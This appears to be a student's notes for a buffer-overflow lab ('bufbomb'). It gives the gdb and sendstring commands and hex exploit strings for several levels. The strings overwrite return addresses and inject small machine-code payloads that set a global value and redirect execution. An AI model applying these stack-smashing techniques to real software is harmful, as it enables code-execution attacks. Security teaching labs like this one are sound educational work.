0x1b26ae62
moskowmh+adro4510

./sendstring < sparkler.txt > sparkler-raw.txt
./bufbomb -t moskowmh+adro4510 < sparkler-raw.txt
<gdb> info variables
<gdb> break getbuf
run -t moskowmh+adro4510
x/20wx $ebp	

Candle
Smoke address : 08 04 94 60
Little endian address : 60 94 04 08
epd-esp = 0x18-0x4 = 0x14 = 20
01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 60 94 04 08

Sparkler
Fizz address : 08 04 93 f0
Little endian address : f0 93 04 08
01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 f0 93 04 08 10 10 10 10 62 ae 26 1b

Firecracker
bang address : 08 04 93 80
Little endian address : 80 93 04 08
global_value address : 08 04 c0 fc
Little endian address : fc c0 04 08
string beginning address :  bf ff be 4c
c7 05 fc c0 04 08 62 ae 26 1b 68 80 93 04 08 c3 4c be ff bf

Dynamite
test ebp value : bf ff be 88
ret address : 08 04 95 4c
string beginning address :  bf ff be 4c
b8 62 ae 26 1b bd 88 be ff bf 68 4c 95 04 08 c3 4c be ff bf

Nitro
return address : bf ff bc 30
adjusted return : bf ff bd 30
